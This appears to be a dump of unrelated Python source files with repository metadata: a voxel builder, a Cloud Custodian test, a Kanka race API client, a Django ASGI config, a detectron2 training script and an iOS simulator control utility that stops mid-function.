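    # DATA/FILES are parsed lazily according to the Content-Type header, and
    # user/auth are resolved by the configured authenticators on first access.
    return drf_request.method, drf_request.DATA, drf_request.user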
| 33.458234 | 107 | 0.633426 |
4f2e7eef622a598cd1a2eb3a7a5e5e73348f987d | 964 | py | Python | second/builder/voxel_builder.py | Sakura1221/second.pytorch | 7c452e4bef5035f4fc14c1b78d9adde02ac69e00 | [
"MIT"
] | 2 | 2019-03-29T07:06:09.000Z | 2021-05-14T04:29:08.000Z | second/builder/voxel_builder.py | Sakura1221/second.pytorch | 7c452e4bef5035f4fc14c1b78d9adde02ac69e00 | [
"MIT"
] | null | null | null | second/builder/voxel_builder.py | Sakura1221/second.pytorch | 7c452e4bef5035f4fc14c1b78d9adde02ac69e00 | [
"MIT"
] | null | null | null | import numpy as np
from second.core.voxel_generator import VoxelGenerator
from second.protos import voxel_generator_pb2
def build(voxel_config):
"""Builds a tensor dictionary based on the InputReader config.
Args:
input_reader_config: A input_reader_pb2.InputReader object.
Returns:
A tensor dict based on the input_reader_config.
Raises:
ValueError: On invalid input reader proto.
ValueError: If no input paths are specified.
"""
if not isinstance(voxel_config, (voxel_generator_pb2.VoxelGenerator)): # 数据类型检查
raise ValueError('input_reader_config not of type '
'input_reader_pb2.InputReader.')
voxel_generator = VoxelGenerator(
voxel_size=list(voxel_config.voxel_size),
point_cloud_range=list(voxel_config.point_cloud_range),
max_num_points=voxel_config.max_number_of_points_per_voxel,
max_voxels=20000)
return voxel_generator
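# --- Added usage sketch (not part of the original module) -------------------
# A hedged example of building a VoxelGenerator from a VoxelGenerator proto.
# The field names follow the attributes read by build() above; the numeric
# values (and the assumption that voxel_size / point_cloud_range are repeated
# float fields) are illustrative only.
def _build_example():
    voxel_config = voxel_generator_pb2.VoxelGenerator()
    voxel_config.voxel_size.extend([0.2, 0.2, 0.4])
    voxel_config.point_cloud_range.extend([0.0, -40.0, -3.0, 70.4, 40.0, 1.0])
    voxel_config.max_number_of_points_per_voxel = 35
    return build(voxel_config)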
| 33.241379 | 83 | 0.725104 |
2a6e6ed4e2bfe478b4dc7b94522661c16bd151a7 | 2,198 | py | Python | tests/test_directory.py | ticketmaster/cloud-custodian | 0da3866f70f858895af228cc08706d0909a2a324 | [
"Apache-2.0"
] | null | null | null | tests/test_directory.py | ticketmaster/cloud-custodian | 0da3866f70f858895af228cc08706d0909a2a324 | [
"Apache-2.0"
] | 4 | 2017-02-02T17:08:23.000Z | 2017-05-25T19:33:19.000Z | tests/test_directory.py | ticketmaster/cloud-custodian | 0da3866f70f858895af228cc08706d0909a2a324 | [
"Apache-2.0"
] | null | null | null | # Copyright 2016 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function, unicode_literals
import json
from .common import BaseTest, load_data
class CloudDirectoryTest(BaseTest):
def test_cloud_directory(self):
session_factory = self.replay_flight_data('test_cloud_directory')
client = session_factory().client('clouddirectory')
schema_arn = client.create_schema(Name='gooseberry').get('SchemaArn')
self.addCleanup(client.delete_schema, SchemaArn=schema_arn)
schema_data = load_data('sample-clouddir-schema.json')
client.put_schema_from_json(
SchemaArn=schema_arn,
Document=json.dumps(schema_data))
published_schema = client.publish_schema(
DevelopmentSchemaArn=schema_arn,
Version="1").get('PublishedSchemaArn')
self.addCleanup(client.delete_schema, SchemaArn=published_schema)
dir_info = client.create_directory(
Name='c7n-test', SchemaArn=published_schema)
self.addCleanup(client.delete_directory, DirectoryArn=dir_info['DirectoryArn'])
self.addCleanup(client.disable_directory, DirectoryArn=dir_info['DirectoryArn'])
p = self.load_policy(
{'name': 'cloud-directory',
'resource': 'cloud-directory',
'filters': [
{'type': 'value',
'key': 'State',
'value': 'DELETED',
'op': 'not-equal'},
]
},
session_factory=session_factory)
resources = p.run()
self.assertEqual(len(resources), 1)
| 37.254237 | 88 | 0.671065 |
b6ed14bd2ccbaed8e5698c289f5af155e492b98d | 5,459 | py | Python | kanka-manager/kankaclient/races.py | davidbradlycurtis/kanka-manager | f44f814c6d9433a40cb1edc558baac12f26b31ad | [
"MIT"
] | null | null | null | kanka-manager/kankaclient/races.py | davidbradlycurtis/kanka-manager | f44f814c6d9433a40cb1edc558baac12f26b31ad | [
"MIT"
] | null | null | null | kanka-manager/kankaclient/races.py | davidbradlycurtis/kanka-manager | f44f814c6d9433a40cb1edc558baac12f26b31ad | [
"MIT"
] | null | null | null | """
Kanka Race API
"""
# pylint: disable=bare-except,super-init-not-called,no-else-break
from __future__ import absolute_import
import logging
import json
from kankaclient.constants import BASE_URL, GET, POST, DELETE, PUT
from kankaclient.base import BaseManager
class RaceAPI(BaseManager):
"""Kanka Race API"""
GET_ALL_CREATE_SINGLE: str
GET_UPDATE_DELETE_SINGLE: str
def __init__(self, token, campaign, verbose=False):
super().__init__(token=token, verbose=verbose)
self.logger = logging.getLogger(self.__class__.__name__)
self.campaign = campaign
self.campaign_id = campaign.get('id')
self.races = list()
global GET_ALL_CREATE_SINGLE
global GET_UPDATE_DELETE_SINGLE
GET_ALL_CREATE_SINGLE = BASE_URL + f'/{self.campaign_id}/races'
GET_UPDATE_DELETE_SINGLE = BASE_URL + f'/{self.campaign_id}/races/%s'
if verbose:
self.logger.setLevel(logging.DEBUG)
def get_all(self) -> list:
"""
Retrieves the available races from Kanka
Raises:
KankaException: Kanka Api Interface Exception
Returns:
races: the requested races
"""
if self.races:
return self.races
races = list()
response = self._request(url=GET_ALL_CREATE_SINGLE, request=GET)
if not response.ok:
self.logger.error('Failed to retrieve races from campaign %s', self.campaign.get('name'))
raise self.KankaException(response.text, response.status_code, message=response.reason)
races = json.loads(response.text).get('data')
self.logger.debug(response.json())
        self.races = races
        return races
def get(self, name_or_id: str or int) -> dict:
"""
        Retrieves the desired race by name or id
Args:
name_or_id (str or int): the name or id of the race
Raises:
KankaException: Kanka Api Interface Exception
Returns:
race: the requested race
"""
race = None
if type(name_or_id) is int:
race = self.get_race_by_id(name_or_id)
else:
            races = self.get_all()
for _race in races:
if _race.get('name') == name_or_id:
race = _race
break
if race is None:
raise self.KankaException(reason=f'Race not found: {name_or_id}', code=404, message='Not Found')
return race
def get_race_by_id(self, id: int) -> dict:
"""
Retrieves the requested race from Kanka
Args:
id (int): the race id
Raises:
KankaException: Kanka Api Interface Exception
Returns:
race: the requested race
"""
response = self._request(url=GET_UPDATE_DELETE_SINGLE % id, request=GET)
if not response.ok:
self.logger.error('Failed to retrieve race %s from campaign %s', id, self.campaign.get('name'))
raise self.KankaException(response.text, response.status_code, message=response.reason)
race = json.loads(response.text).get('data')
self.logger.debug(response.json())
return race
def create(self, race: dict) -> dict:
"""
Creates the provided race in Kanka
Args:
race (dict): the race to create
Raises:
KankaException: Kanka Api Interface Exception
Returns:
race: the created race
"""
response = self._request(url=GET_ALL_CREATE_SINGLE, request=POST, data=json.dumps(race))
if not response.ok:
self.logger.error('Failed to create race %s in campaign %s', race.get('name', 'None'), self.campaign.get('name'))
raise self.KankaException(response.text, response.status_code, message=response.reason)
race = json.loads(response.text).get('data')
self.logger.debug(response.json())
return race
def update(self, race: dict) -> dict:
"""
Updates the provided race in Kanka
Args:
race (dict): the race to create
Raises:
KankaException: Kanka Api Interface Exception
Returns:
race: the updated race
"""
response = self._request(url=GET_UPDATE_DELETE_SINGLE % race.get('id'), request=PUT, data=json.dumps(race))
if not response.ok:
self.logger.error('Failed to update race %s in campaign %s', race.get('name', 'None'), self.campaign.get('name'))
raise self.KankaException(response.text, response.status_code, message=response.reason)
race = json.loads(response.text).get('data')
self.logger.debug(response.json())
return race
def delete(self, id: int) -> bool:
"""
Deletes the provided race in Kanka
Args:
id (int): the race id
Raises:
KankaException: Kanka Api Interface Exception
Returns:
bool: whether the race is successfully deleted
"""
response = self._request(url=GET_UPDATE_DELETE_SINGLE % id, request=DELETE)
if not response.ok:
self.logger.error('Failed to delete race %s in campaign %s', id, self.campaign.get('name'))
raise self.KankaException(response.text, response.status_code, message=response.reason)
self.logger.debug(response)
return True
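# --- Added usage sketch (not part of the original module) -------------------
# A hedged example of driving RaceAPI. The token and campaign dict are
# placeholders (the class only reads the campaign's 'id' and 'name'), and the
# race payload fields are illustrative.
def _race_api_example(token):
    api = RaceAPI(token=token, campaign={'id': 1, 'name': 'Demo campaign'})
    races = api.get_all()                  # every race in the campaign
    race = api.get('Elf')                  # look one up by name (or pass an int id)
    api.update({'id': race.get('id'), 'name': 'Elf', 'entry': 'Updated entry'})
    api.delete(race.get('id'))
    return races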
| 29.192513 | 125 | 0.60817 |
a600e6345d0618db1d9bdc5469027dce4c42a068 | 401 | py | Python | photogallery/asgi.py | erhic/photo_gallery_Django | b6c9b90e628f155c3ad9444c10a974dd22811d64 | [
"MIT"
] | null | null | null | photogallery/asgi.py | erhic/photo_gallery_Django | b6c9b90e628f155c3ad9444c10a974dd22811d64 | [
"MIT"
] | null | null | null | photogallery/asgi.py | erhic/photo_gallery_Django | b6c9b90e628f155c3ad9444c10a974dd22811d64 | [
"MIT"
] | null | null | null | """
ASGI config for photogallery project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'photogallery.settings')
application = get_asgi_application()
| 23.588235 | 78 | 0.790524 |
69b86c54b96a02a42636564e10459c787dd0a00f | 6,148 | py | Python | autorequests/utilities/__init__.py | Hexiro/autorequests | 53923e6f089a34f5cc0babeed305c9b63f8f489b | [
"MIT"
] | 29 | 2021-05-28T20:13:45.000Z | 2022-03-24T22:26:07.000Z | autorequests/utilities/__init__.py | Hexiro/autorequests | 53923e6f089a34f5cc0babeed305c9b63f8f489b | [
"MIT"
] | 5 | 2021-06-19T12:51:56.000Z | 2021-10-17T01:43:18.000Z | autorequests/utilities/__init__.py | Hexiro/autorequests | 53923e6f089a34f5cc0babeed305c9b63f8f489b | [
"MIT"
] | 3 | 2021-06-07T16:27:06.000Z | 2021-07-20T20:49:38.000Z | import functools
import json
import keyword
import sys
import urllib.parse
from typing import List, Dict, Optional, Callable, Union
from .regexp import leading_integer_regexp
# pretty simplistic names tbf
# a lot of these aren't super self explanatory so they have docstring
__all__ = (
"cached_property",
"indent",
"is_pythonic_name",
"extract_cookies",
"merge_dicts",
"format_dict",
"parse_url_encoded",
"written_form",
"unique_name",
"fix_escape_chars",
)
if sys.version_info >= (3, 8):
from functools import cached_property
else:
def cached_property(func: Callable) -> property:
return property(functools.lru_cache()(func))
def indent(data: str, spaces: int = 4) -> str:
"""
indents a code block a set amount of spaces
note: is ~1.5x faster than textwrap.indent(data, " " * spaces)
(from my testing)
"""
indent_block = " " * spaces
return "\n".join((indent_block + line if line else line) for line in data.splitlines())
def is_pythonic_name(text: str) -> bool:
""":returns: true if the string provided is a valid function, class, or var name"""
return text.isidentifier() and not keyword.iskeyword(text)
def extract_cookies(headers: Dict[str, str]) -> Dict[str, str]:
""":returns: a dict of cookies based off the 'cookie' header"""
cookie_header = headers.pop("cookie", None)
if not cookie_header:
return {}
cookie_dict = {}
for cookie in cookie_header.split("; "):
key, value = cookie.split("=", maxsplit=1)
cookie_dict[key] = value
return cookie_dict
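# --- Added example (not part of the original module) ------------------------
# extract_cookies pops the lower-case "cookie" header and splits it into a
# dict; the header values below are illustrative.
def _extract_cookies_example() -> None:
    headers = {"cookie": "session=abc123; theme=dark", "accept": "*/*"}
    assert extract_cookies(headers) == {"session": "abc123", "theme": "dark"}
    assert "cookie" not in headers  # the header is consumed in place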
def merge_dicts(*dicts: Dict[str, str]) -> Dict[str, str]:
""":returns: a dictionary with the items that all of the dicts in the list share"""
# if there is 0 or 1 dicts, there will be no matches
if len(dicts) <= 1:
return {}
# they ALL have to share an item for it to be accepted,
# therefore we can just loop over the first dict in the list and check if it matches the other items
return {k: v for k, v in dicts[0].items() if all(x.get(k) == v for x in dicts[1:])}
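# --- Added example (not part of the original module) ------------------------
# merge_dicts keeps only the key/value pairs shared by every dict passed in;
# the sample dicts are illustrative.
def _merge_dicts_example() -> None:
    assert merge_dicts({"a": "1", "b": "2"}, {"a": "1", "b": "3"}) == {"a": "1"}
    assert merge_dicts({"a": "1"}) == {}  # fewer than two dicts -> no matches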
def format_dict(data: dict, indent: Optional[int] = 4, variables: Optional[List[str]] = None) -> str:
"""format a dictionary"""
variables = variables or []
# I'm not sure it's possible to pretty-format this with something like
# pprint, but if it is possible LMK!
formatted = json.dumps(data, indent=indent)
# parse bools and none
# leading space allows us to only match literal false and not "false" string
formatted = formatted.replace(" null", " None")
formatted = formatted.replace(" true", " True")
formatted = formatted.replace(" false", " False")
# parse when key names are the same as value
# leading ": " means that it will replace the value and not the key
for var in variables:
formatted = formatted.replace(f': "{var}"', f": {var}")
return formatted
def parse_url_encoded(data: str) -> Dict[str, str]:
"""parses application/x-www-form-urlencoded and query string params"""
return dict(urllib.parse.parse_qsl(data, keep_blank_values=True))
# kinda screwed if english changes
# if english has progressed please make a pr :pray:
ones_dict = {
"1": "one",
"2": "two",
"3": "three",
"4": "four",
"5": "five",
"6": "six",
"7": "seven",
"8": "eight",
"9": "nine",
}
tens_dict = {
"1": "ten",
"2": "twenty",
"3": "thirty",
"4": "forty",
"5": "fifty",
"6": "sixty",
"7": "seventy",
"8": "eighty",
"9": "ninety",
}
unique_dict = {
"11": "eleven",
"12": "twelve",
"13": "thirteen",
"14": "fourteen",
"15": "fifteen",
"16": "sixteen",
"17": "seventeen",
"18": "eighteen",
"19": "nineteen",
}
def written_form(num: Union[int, str]) -> str:
""":returns: written form of an integer 0-999, or for the leading integer of a string"""
if isinstance(num, str):
# if string is an integer
if num.isdigit():
return written_form(int(num))
# try to parse leading integer
match = leading_integer_regexp.search(num)
if not match:
return num
# if str starts with integer
initial_num = match.group(0)
written_num = written_form(int(initial_num))
rest = num[match.end() :]
return f"{written_num}_{rest}"
    if num < 0 or num > 999:
raise NotImplementedError("Numbers must be in range 0...999 inclusive")
if num == 0:
return "zero"
# mypy & pycharm don't like string unpacking
full_num = str(num).zfill(3)
hundreds = full_num[0]
tens = full_num[1]
ones = full_num[2]
ones_match = ones_dict.get(ones)
tens_match = tens_dict.get(tens)
unique_match = unique_dict.get(f"{tens}{ones}")
hundreds_match = ones_dict.get(hundreds)
written = []
if hundreds_match:
written.append(f"{hundreds_match}_hundred")
if unique_match:
written.append(unique_match)
elif tens_match and ones_match:
written.append(f"{tens_match}_{ones_match}")
elif tens_match:
written.append(tens_match)
elif ones_match:
written.append(ones_match)
return "_and_".join(written)
def unique_name(name: str, other_names: List[str]) -> str:
""":returns a unique name based on the name passed and the taken names"""
matches = [item for item in other_names if item.startswith(name)]
if not any(matches):
return name
matched_names_length = len(matches)
if matched_names_length > 999:
raise NotImplementedError(">999 methods with similar names not supported")
written = written_form(matched_names_length + 1)
return name + "_" + written
def fix_escape_chars(text: str) -> str:
"""
replaces escaped \\ followed by a letter to the appropriate char
ignore/replace are kind of just guesses at what i think would be best
if there is a more logical reason to use something else LMK!
(ex. "\\t" --> "\t")
"""
return text.encode(encoding="utf8", errors="ignore").decode(encoding="unicode_escape", errors="replace")
| 31.208122 | 108 | 0.638907 |
0972e326cedc338e7cce0ba017fc4b5b8c1d5cb6 | 1,687 | py | Python | tmp_colab.py | natureyoo/siamese-triplet | 83c916e30fa40d890febeffc25cf6bedf542fd3f | [
"BSD-3-Clause"
] | null | null | null | tmp_colab.py | natureyoo/siamese-triplet | 83c916e30fa40d890febeffc25cf6bedf542fd3f | [
"BSD-3-Clause"
] | null | null | null | tmp_colab.py | natureyoo/siamese-triplet | 83c916e30fa40d890febeffc25cf6bedf542fd3f | [
"BSD-3-Clause"
] | 1 | 2020-12-08T02:20:25.000Z | 2020-12-08T02:20:25.000Z | import detectron2
from detectron2.utils.logger import setup_logger
setup_logger()
# import some common libraries
import numpy as np
import cv2
import random
# import some common detectron2 utilities
from detectron2 import model_zoo
from detectron2.engine import DefaultPredictor, DefaultTrainer
from detectron2.config import get_cfg
from detectron2.utils.visualizer import Visualizer
from detectron2.data import MetadataCatalog
from detectron2.data.datasets import register_coco_instances
from detectron2.modeling import build_model
import pkg_resources
import os
import torch.distributed as dist
from detectron2.utils import comm
register_coco_instances("deepfashion2_train", {}, "/second/DeepFashion2/coco_format/instance_train.json", "/second/DeepFashion2/train/image")
register_coco_instances("deepfashion2_val", {}, "/second/DeepFashion2/coco_format/instance_val.json", "/second/DeepFashion2/val/image/")
config_path = "COCO-InstanceSegmentation/mask_rcnn_R_101_FPN_3x.yaml"
cfg_file = pkg_resources.resource_filename("detectron2.model_zoo", os.path.join("configs", config_path))
cfg = get_cfg()
cfg.merge_from_file(cfg_file)
cfg.DATASETS.TRAIN = ("deepfashion2_train",)
cfg.DATASETS.TEST = ("deepfashion2_val",)
cfg.DATALOADER.NUM_WORKERS = 2
cfg.MODEL.WEIGHTS = '../output/model_0029999.pth'
cfg.SOLVER.IMS_PER_BATCH = 3
cfg.SOLVER.BASE_LR = 0.00025
cfg.SOLVER.MAX_ITER = 3000
cfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = 128
cfg.MODEL.ROI_HEADS.NUM_CLASSES = 13
# model_zoo.get_checkpoint_url("COCO-InstanceSegmentation/mask_rcnn_R_101_FPN_3x.yaml") # Let training initialize from model zoo
trainer = DefaultTrainer(cfg)
trainer.resume_or_load(resume=False)
trainer.train() | 37.488889 | 141 | 0.827504 |
cd5a7cdf23a51930db7a193f0cdcccfd8786efc7 | 721 | py | Python | web_crawler/tasks/__init__.py | RYU-BB/web_crawling | 0cd7745aba1f97f7c3c924e4ea1b602d7e0a0453 | [
"Apache-2.0"
] | null | null | null | web_crawler/tasks/__init__.py | RYU-BB/web_crawling | 0cd7745aba1f97f7c3c924e4ea1b602d7e0a0453 | [
"Apache-2.0"
] | null | null | null | web_crawler/tasks/__init__.py | RYU-BB/web_crawling | 0cd7745aba1f97f7c3c924e4ea1b602d7e0a0453 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021, Myeonghyeon Ryu. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from web_crawler.tasks.naver_blog import NaverBlogCrawler
from web_crawler.tasks.daum_blog import DaumBlogCrawler
| 42.411765 | 74 | 0.78086 |
729e37095ca86f3731d08c7a84dfb46d879bdde9 | 26,475 | py | Python | simulator_control/simulator_util.py | jverkoey/xctestrunner | 2f88d59c3c28935a124967dc382f413640d2868c | [
"Apache-2.0"
] | 1 | 2020-11-10T00:38:14.000Z | 2020-11-10T00:38:14.000Z | simulator_control/simulator_util.py | keith/xctestrunner | 586a51b90cfbd13ef23a101f719d64bd0fe0ec60 | [
"Apache-2.0"
] | 1 | 2019-12-05T22:06:33.000Z | 2019-12-05T22:18:25.000Z | simulator_control/simulator_util.py | woshimaliang/xctestrunner | b0cba583c03fe1af4b18ccf17d0c728e5b01648d | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The utility class for simulator."""
import json
import logging
import os
import pwd
import re
import shutil
import subprocess
import time
from xctestrunner.shared import ios_constants
from xctestrunner.shared import ios_errors
from xctestrunner.shared import plist_util
from xctestrunner.shared import xcode_info_util
from xctestrunner.simulator_control import simtype_profile
_SIMULATOR_STATES_MAPPING = {
0: ios_constants.SimState.CREATING,
1: ios_constants.SimState.SHUTDOWN,
3: ios_constants.SimState.BOOTED
}
_PREFIX_RUNTIME_ID = 'com.apple.CoreSimulator.SimRuntime.'
_SIM_OPERATION_MAX_ATTEMPTS = 3
_SIMCTL_MAX_ATTEMPTS = 2
_SIMULATOR_CREATING_TO_SHUTDOWN_TIMEOUT_SEC = 10
_SIMULATOR_SHUTDOWN_TIMEOUT_SEC = 30
_SIM_ERROR_RETRY_INTERVAL_SEC = 2
_SIM_CHECK_STATE_INTERVAL_SEC = 0.5
_PATTERN_APP_CRASH_ON_SIM = (
r'com\.apple\.CoreSimulator\.SimDevice\.[A-Z0-9\-]+(.+) '
r'\(UIKitApplication:%s(.+)\): Service exited '
'(due to (signal|Terminated|Killed|Abort trap)|with abnormal code)')
_PATTERN_XCTEST_PROCESS_CRASH_ON_SIM = (
r'com\.apple\.CoreSimulator\.SimDevice\.[A-Z0-9\-]+(.+) '
r'\((.+)xctest\[[0-9]+\]\): Service exited '
'(due to (signal|Terminated|Killed|Abort trap)|with abnormal code)')
_PATTERN_CORESIMULATOR_CRASH = (
r'com\.apple\.CoreSimulator\.SimDevice\.[A-Z0-9\-]+(.+) '
r'\(com\.apple\.CoreSimulator(.+)\): Service exited due to ')
class Simulator(object):
"""The object for simulator in MacOS."""
def __init__(self, simulator_id):
"""Constructor of Simulator object.
Args:
simulator_id: string, the identity of the simulator.
"""
self._simulator_id = simulator_id
self._simulator_root_dir = None
self._simulator_log_root_dir = None
self._device_plist_object = None
@property
def simulator_id(self):
if not self._simulator_id:
raise ios_errors.SimError(
'The simulator has not been created or has been deleted.')
return self._simulator_id
@property
def simulator_system_log_path(self):
return os.path.join(self.simulator_log_root_dir, 'system.log')
@property
def simulator_root_dir(self):
"""Gets the simulator's root directory."""
if not self._simulator_root_dir:
home_dir = pwd.getpwuid(os.geteuid()).pw_dir
self._simulator_root_dir = os.path.join(
'%s/Library/Developer/CoreSimulator/Devices/%s' %
(home_dir, self.simulator_id))
return self._simulator_root_dir
@property
def simulator_log_root_dir(self):
"""Gets the root directory of the simulator's logs."""
if not self._simulator_log_root_dir:
home_dir = pwd.getpwuid(os.geteuid()).pw_dir
self._simulator_log_root_dir = os.path.join(
'%s/Library/Logs/CoreSimulator/%s' % (home_dir, self.simulator_id))
return self._simulator_log_root_dir
@property
def device_plist_object(self):
"""Gets the plist_util.Plist object of device.plist of the simulator.
Returns:
a plist_util.Plist object of device.plist of the simulator or None when
the simulator does not exist or is being created.
"""
if not self._device_plist_object:
device_plist_path = os.path.join(self.simulator_root_dir, 'device.plist')
if not os.path.exists(device_plist_path):
return None
self._device_plist_object = plist_util.Plist(device_plist_path)
return self._device_plist_object
def Shutdown(self):
"""Shuts down the simulator."""
sim_state = self.GetSimulatorState()
if sim_state == ios_constants.SimState.SHUTDOWN:
logging.info('Simulator %s has already shut down.', self.simulator_id)
return
if sim_state == ios_constants.SimState.CREATING:
raise ios_errors.SimError(
'Can not shut down the simulator in state CREATING.')
logging.info('Shutting down simulator %s.', self.simulator_id)
try:
RunSimctlCommand(['xcrun', 'simctl', 'shutdown', self.simulator_id])
except ios_errors.SimError as e:
if 'Unable to shutdown device in current state: Shutdown' in str(e):
logging.info('Simulator %s has already shut down.', self.simulator_id)
return
raise ios_errors.SimError('Failed to shutdown simulator %s: %s' %
(self.simulator_id, str(e)))
self.WaitUntilStateShutdown()
logging.info('Shut down simulator %s.', self.simulator_id)
def Delete(self):
"""Deletes the simulator asynchronously.
The simulator state should be SHUTDOWN when deleting it. Otherwise, it will
raise exception.
Raises:
ios_errors.SimError: The simulator's state is not SHUTDOWN.
"""
    # In Xcode 9+, simctl can delete a booted simulator. Prior to Xcode 9,
    # we have to shut down the simulator first before deleting it.
if xcode_info_util.GetXcodeVersionNumber() < 900:
sim_state = self.GetSimulatorState()
if sim_state != ios_constants.SimState.SHUTDOWN:
raise ios_errors.SimError(
'Can only delete the simulator with state SHUTDOWN. The current '
'state of simulator %s is %s.' % (self._simulator_id, sim_state))
logging.info('Deleting simulator %s asynchronously.', self.simulator_id)
subprocess.Popen(['xcrun', 'simctl', 'delete', self.simulator_id],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=os.setpgrp)
# The delete command won't delete the simulator log directory.
if os.path.exists(self.simulator_log_root_dir):
shutil.rmtree(self.simulator_log_root_dir, ignore_errors=True)
self._simulator_id = None
def FetchLogToFile(self, output_file_path, start_time=None, end_time=None):
"""Gets simulator log via running `log` tool on simulator.
Args:
output_file_path: string, the path of the stdout file.
      start_time: datetime, the start time of the simulator log.
      end_time: datetime, the end time of the simulator log.
"""
command = [
'xcrun', 'simctl', 'spawn', self._simulator_id, 'log', 'show',
'--style', 'syslog'
]
if start_time:
command.extend(('--start', start_time.strftime('%Y-%m-%d %H:%M:%S')))
if end_time:
command.extend(('--end', end_time.strftime('%Y-%m-%d %H:%M:%S')))
with open(output_file_path, 'w') as stdout_file:
try:
subprocess.Popen(command, stdout=stdout_file, stderr=subprocess.STDOUT)
except ios_errors.SimError as e:
raise ios_errors.SimError('Failed to get log on simulator %s: %s' %
(self.simulator_id, str(e)))
def GetAppDocumentsPath(self, app_bundle_id):
"""Gets the path of the app's Documents directory."""
if xcode_info_util.GetXcodeVersionNumber() >= 830:
try:
app_data_container = RunSimctlCommand([
'xcrun', 'simctl', 'get_app_container', self._simulator_id,
app_bundle_id, 'data'
])
return os.path.join(app_data_container, 'Documents')
except ios_errors.SimError as e:
raise ios_errors.SimError(
'Failed to get data container of the app %s in simulator %s: %s' %
(app_bundle_id, self._simulator_id, str(e)))
apps_dir = os.path.join(self.simulator_root_dir,
'data/Containers/Data/Application')
for sub_dir_name in os.listdir(apps_dir):
container_manager_plist = plist_util.Plist(
os.path.join(apps_dir, sub_dir_name,
'.com.apple.mobile_container_manager.metadata.plist'))
current_app_bundle_id = container_manager_plist.GetPlistField(
'MCMMetadataIdentifier')
if current_app_bundle_id == app_bundle_id:
return os.path.join(apps_dir, sub_dir_name, 'Documents')
raise ios_errors.SimError(
'Failed to get Documents directory of the app %s in simulator %s' %
(app_bundle_id, self._simulator_id))
def IsAppInstalled(self, app_bundle_id):
"""Checks if the simulator has installed the app with given bundle id."""
try:
RunSimctlCommand([
'xcrun', 'simctl', 'get_app_container', self._simulator_id,
app_bundle_id
])
return True
except ios_errors.SimError:
return False
def WaitUntilStateShutdown(self, timeout_sec=_SIMULATOR_SHUTDOWN_TIMEOUT_SEC):
"""Waits until the simulator state becomes SHUTDOWN.
Args:
timeout_sec: int, timeout of waiting simulator state for becoming SHUTDOWN
in seconds.
Raises:
ios_errors.SimError: when it is timeout to wait the simulator state
becomes SHUTDOWN.
"""
start_time = time.time()
while start_time + timeout_sec >= time.time():
if self.GetSimulatorState() == ios_constants.SimState.SHUTDOWN:
return
time.sleep(_SIM_CHECK_STATE_INTERVAL_SEC)
raise ios_errors.SimError('Timeout to wait for simulator shutdown in %ss.' %
timeout_sec)
def GetSimulatorState(self):
"""Gets the state of the simulator in real time.
Returns:
shared.ios_constants.SimState, the state of the simulator.
Raises:
ios_errors.SimError: The state can not be recognized.
"""
if self.device_plist_object is None:
return ios_constants.SimState.CREATING
state_num = self.device_plist_object.GetPlistField('state')
if state_num not in _SIMULATOR_STATES_MAPPING.keys():
logging.warning('The state %s of simulator %s can not be recognized.',
state_num, self.simulator_id)
return ios_constants.SimState.UNKNOWN
return _SIMULATOR_STATES_MAPPING[state_num]
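# --- Added usage sketch (not part of the original module) -------------------
# A hedged example of driving a Simulator object; the simulator_id argument is
# a UDID as reported by `xcrun simctl list devices`.
def _simulator_example(simulator_id):
  simulator = Simulator(simulator_id)
  if simulator.GetSimulatorState() == ios_constants.SimState.BOOTED:
    simulator.Shutdown()
  logging.info('System log lives at %s', simulator.simulator_system_log_path)
  simulator.Delete()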
def CreateNewSimulator(device_type=None, os_version=None, name_prefix=None):
"""Creates a new simulator according to arguments.
If neither device_type nor os_version is given, will use the latest iOS
version and latest iPhone type.
If os_version is given but device_type is not, will use latest iPhone type
according to the OS version limitation. E.g., if the given os_version is 9.3,
the latest simulator type is iPhone 6s Plus. Because the min OS version of
iPhone 7 is 10.0.
If device_type is given but os_version is not, will use the min value
between max OS version of the simulator type and current latest OS version.
E.g., if the given device_type is iPhone 5 and latest OS version is 10.3,
will use 10.2. Because the max OS version of iPhone 5 is 10.2.
Args:
device_type: string, device type of the new simulator. The value corresponds
to the output of `xcrun simctl list devicetypes`. E.g., iPhone 6, iPad
Air, etc.
os_version: string, OS version of the new simulator. The format is
{major}.{minor}, such as 9.3, 10.2.
name_prefix: string, name prefix of the new simulator. By default, it is
"New".
Returns:
a tuple with four items:
string, id of the new simulator.
string, simulator device type of the new simulator.
string, OS version of the new simulator.
string, name of the new simulator.
Raises:
ios_errors.SimError: when failed to create new simulator.
ios_errors.IllegalArgumentError: when the given argument is invalid.
"""
if not device_type:
os_type = ios_constants.OS.IOS
else:
_ValidateSimulatorType(device_type)
os_type = GetOsType(device_type)
if not os_version:
os_version = GetLastSupportedSimOsVersion(os_type, device_type=device_type)
else:
supported_sim_os_versions = GetSupportedSimOsVersions(os_type)
if os_version not in supported_sim_os_versions:
raise ios_errors.IllegalArgumentError(
'The simulator os version %s is not supported. Supported simulator '
'os versions are %s.' % (os_version, supported_sim_os_versions))
if not device_type:
